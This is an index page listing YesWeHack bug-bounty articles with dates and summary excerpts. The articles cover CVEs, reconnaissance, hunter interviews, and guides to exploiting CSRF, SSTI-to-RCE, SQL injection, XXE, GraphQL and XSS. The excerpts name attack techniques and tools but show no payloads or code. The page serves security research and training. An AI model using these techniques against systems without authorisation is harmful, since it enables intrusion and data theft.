yeswehack.com
Resources curated from this publisher and indexed across appsec.fyi topic pages. Last item added: 2026-06-20.
| Date Added | Resource | Excerpt |
|---|---|---|
| 2026-06-20 2026 | Hacking in the age of AI: LLMs, agentic CLIs and MCP servers for Bug Bounty huntersAIBug Bounty | This article explores how AI, specifically Large Language Models (LLMs) and agentic CLIs, are transforming bug bounty hunting. It discusses leveraging AI tools for tasks like vulnerability discovery, code analysis, and exploit generation. The content highlights how LLMs can assist in understanding complex codebases and identifying potential weaknesses, while agentic CLIs can automate repetitive security testing processes. The integration of these AI technologies aims to enhance efficiency and effectiveness for bug bounty hunters in the evolving cybersecurity landscape. |
| 2026-06-16 2026 | ‘I found a CSRF and could deploy code through an enterprise’s App Store account’: yassine_eal’s Bug Bounty storyCSRF | Yassine_eal discovered a Cross-Site Request Forgery (CSRF) vulnerability that allowed them to deploy code through an enterprise's App Store account. This exploit could have significant implications for application security and developer trust. The story highlights the importance of robust security measures, even in seemingly secure platforms like app stores. The specific bounty amount is not mentioned. |
| 2026-06-13 2026 | CVE-2026-48907: Unauthenticated RCE in the Joomla Content Editor extensionRCE | CVE-2026-48907: Unauthenticated RCE in the Joomla Content Editor extension |
| 2026-06-12 2026 | What to do when your CEO asks, ‘Are we exposed?’Bug Bounty | When a CEO asks "Are we exposed?" to a new vulnerability, swift action and reliable validation are crucial. Organizations need to quickly determine their exposure to emerging threats. This involves rapidly assessing systems and data for signs of compromise or susceptibility. Without speed and validation, it's impossible to accurately gauge risk and respond effectively to potential security breaches. |
| 2026-06-11 2026 | The prioritisation problem: dealing with a growing vulnerability backlogBug Bounty | A growing vulnerability backlog presents a significant challenge for organizations. The core issue lies in effectively prioritizing which vulnerabilities to address first, especially when resources are limited. This necessitates a strategic approach to risk assessment and a clear understanding of potential impacts to make informed decisions about remediation efforts. Without a robust prioritization framework, critical vulnerabilities may be overlooked, increasing an organization's exposure to threats. |
| 2026-06-11 2026 | Dojo challenge #51 Deadbolt solutionBug Bounty | This content appears to be the solution to "Dojo challenge #51 Deadbolt." However, no details about the challenge itself or any bug bounty payout amounts are provided in the given text. Therefore, a summary of the solution's key points and main ideas cannot be generated without further information. |
| 2026-06-08 2026 | CVE-2026-9082: PostgreSQL SQL Injection in DrupalSQLi | This content describes CVE-2026-9082, a critical SQL injection vulnerability discovered in Drupal, specifically affecting its PostgreSQL database integration. The vulnerability allows attackers to inject malicious SQL code, potentially leading to unauthorized data access, modification, or deletion. No bug bounty payout amount is mentioned in the provided text. |
| 2026-06-08 2026 | ‘You have to be curious to do this job’: SpawnZii on balancing Bug Bounty with pentestingBug Bounty | This article features insights from SpawnZii on the demanding yet rewarding career of bug bounty hunting and penetration testing. The core message emphasizes that a high degree of **curiosity** is paramount for success in these fields. This inquisitiveness drives the exploration and discovery necessary to identify vulnerabilities. While the content highlights the skills and mindset required, it **does not mention any specific bug bounty payout amounts**. |
| 2026-06-08 2026 | They said AI would kill Bug Bounty. The data says otherwiseAIBug Bounty | AI is not killing bug bounty programs; data suggests the opposite. While some predicted AI would automate vulnerability discovery, rendering bug bounties obsolete, the reality is more nuanced. Bug bounty programs continue to thrive and evolve, with AI potentially becoming a tool for hunters rather than a replacement. The core value of human ingenuity and creativity in finding complex, logic-based vulnerabilities remains crucial, indicating a collaborative future between AI and bug bounty hunters. |
| 2026-06-08 2026 | ‘Delivered exactly what we hoped for’: How TeamViewer built a successful Bug Bounty ProgramBug Bounty | TeamViewer's bug bounty program has been a significant success, exceeding their expectations by strengthening their security posture. The program, which has run for two years, has proactively identified and addressed vulnerabilities, leading to improved product security and customer trust. This initiative demonstrates TeamViewer's commitment to continuous improvement and safeguarding its users. |
| 2026-06-08 2026 | How LLMs are changing Bug Bounty: An interview with AitugloAIBug Bounty | This interview with Aituglo explores how Large Language Models (LLMs) are transforming bug bounty programs. LLMs are proving invaluable in various stages of the bug bounty lifecycle, from aiding researchers in identifying vulnerabilities to assisting bug bounty platform operators in triaging and verifying reports. Aituglo highlights the increasing efficiency and effectiveness that LLMs bring to the cybersecurity landscape, enabling faster discovery and remediation of security flaws. The discussion emphasizes the growing role of AI in enhancing the capabilities of bug bounty hunters and the overall security ecosystem. |
| 2026-04-22 2026 | Uncover Hidden Assets with Bug Bounty Recon: Fuzzing and JS AnalysisRecon | Library for bug bounty reconnaissance that teaches parameter fuzzing, forced browsing, and JS analysis. It covers using tools like LinkFinder and bookmarklets for endpoint discovery, integrating Burp Suite extensions such as JSLinkFinder, GAP, and JSpector for automated JS analysis, and employing techniques like path and parameter fuzzing to uncover hidden assets and potential vulnerabilities. |
| 2026-04-17 2026 | Recon series #4: Port scanning methods (YesWeHack)Recon | Library for reconnaissance techniques, detailing passive and active port scanning methods to uncover open ports and hidden services. It explores tools like Nmap, Masscan, and Naabu, and techniques such as TCP SYN, CONNECT, and UDP scanning, alongside banner grabbing for service identification. The resource also covers evasion strategies for firewalls and IDS, referencing methods like decoys and scan delays to improve stealth. |
| 2026-04-17 2026 | Subdomain enumeration: expand attack surface with active, passive methodsRecon | Library for advanced subdomain enumeration, this resource details passive techniques using tools like Censys, Shodan, Subfinder, and Amass, alongside active methods such as DNS brute-forcing with Gobuster. It emphasizes expanding the attack surface by discovering hidden subdomains through analyzing public databases, SSL logs, and web archives, and through direct interaction with the target, offering practical examples for bug bounty hunting and penetration testing. |
| 2026-04-16 2026 | The Bug Bounty Guide to Exploiting CSRF Vulnerabilities - YesWeHackCSRF | Guide to exploiting Cross-Site Request Forgery (CSRF) vulnerabilities, detailing POST-based, GET-based, and stored CSRF attacks. It explains how attackers leverage a user's authenticated session to trick their browser into executing unauthorized actions, such as changing account settings or transferring funds. The guide illustrates real-world scenarios and payloads, including HTML forms for POST requests and image tags for GET requests, to demonstrate the mechanisms and impact of these vulnerabilities, emphasizing the exploitation of trust between browser and site without proper anti-CSRF protections. |
| 2026-04-16 2026 | Smart Automation with Burp Suite - YesWeHackBurp | Library for automating Burp Suite workflows, this resource details using passive scanners like the built-in passive scanner and passive crawler, alongside extensions such as BChecks, Burp Bounty, and Logger++, to streamline bug bounty efforts. It explains how to combine active and passive scanning to efficiently gather information and discover vulnerabilities, emphasizing the importance of custom headers for tracking BCheck requests and leveraging error messages for deeper analysis, while still advocating for manual testing to complement automated findings. |
| 2026-04-10 2026 | SSTI Exploitation with RCE Everywhere | YesWeHackRCESSTI | Writeup detailing advanced Server-Side Template Injection (SSTI) exploitation techniques for achieving Remote Code Execution (RCE) without quotes or external plugins. It covers payloads for Jinja2, Mako, Twig, Smarty, Blade, Groovy, and FreeMarker, demonstrating how to bypass auto-escaping and exploit built-in functions like `chr`, `popen`, `passthru`, and `execute` across various languages and frameworks. |
| 2026-04-10 2026 | Recon Roundup: Ultimate Reconnaissance GuideRecon | Guide summarizing Bug Bounty reconnaissance techniques, including subdomain enumeration, port scanning, HTTP fingerprinting, hidden-parameter mapping, Google dorking, and archive-based recon. It details how to use tools like Nmap, Shodan, and the Wayback Machine, and covers manual methods such as force browsing and fuzzing for hidden directories, aiming to uncover high-impact vulnerabilities overlooked by automated scanners. |
| 2026-04-03 2026 | SQL Injection for Bug Bounty Hunters | YesWeHackSQLi | Guide on SQL injection techniques for bug bounty hunters, covering blind SQLi, time-based attacks, and out-of-band callbacks. It details how to tailor payloads to SQL statements, integrate detection into bug bounty workflows, and exploit SQLi even in hardened systems, referencing vulnerabilities like CVE-2022-21661 in WordPress. |
| 2026-04-03 2026 | XML External Entity: The Ultimate Bug Bounty Guide to XXE | YesWeHackXXE | Guide to XML External Entity (XXE) vulnerabilities, this resource details how attackers exploit XML parsers to access sensitive files like /etc/passwd, conduct internal network reconnaissance, and even achieve remote code execution. It covers how XXE attacks leverage external entity declarations within XML input, leading to file disclosure, Server-Side Request Forgery (SSRF), and denial-of-service. The guide explains that XXE often arises from legacy code, explicit feature enablement, or custom configurations in parsers used in document processing systems (DOCX, XLSX), API endpoints, SOAP services, and SVG processors. |
| 2026-04-03 2026 | Hacking GraphQL Endpoints in Bug Bounty Programs | YesWeHackGraphQL | Library for identifying and exploiting GraphQL vulnerabilities, this guide details techniques such as abusing introspection queries and field suggestions, and performing mutation manipulation and batching attacks. It covers common vulnerabilities like information disclosure, IDOR, and improper access control, recommending tools such as GraphQL Voyager, InQL, Clairvoyance, and GraphQLmap for both introspection and fuzzing attacks when introspection is disabled. |
| 2026-04-03 2026 | XSS Attacks & Exploitation: The Ultimate Guide | YesWeHackXSS | Guide to XSS attacks and exploitation, covering reflected, stored, and DOM variants. It details detection methods, exploitation techniques, and real-world scenarios, emphasizing why mastering XSS, CWE-79, is crucial for bug bounty hunters and ethical hackers. The guide explains how to leverage user input to inject malicious JavaScript, leading to session hijacking, account takeovers, and data exfiltration. It also explores chaining vulnerabilities like CSRF with authenticated reflected XSS for greater impact, and discusses payload obfuscation for stored XSS. |
| 2023-08-11 2023 | YesWeHack #1 Bug Bounty Platform in EuropeBug Bounty | YesWeHack #1 Bug Bounty Platform in Europe https://ift.tt/N0aPy8c |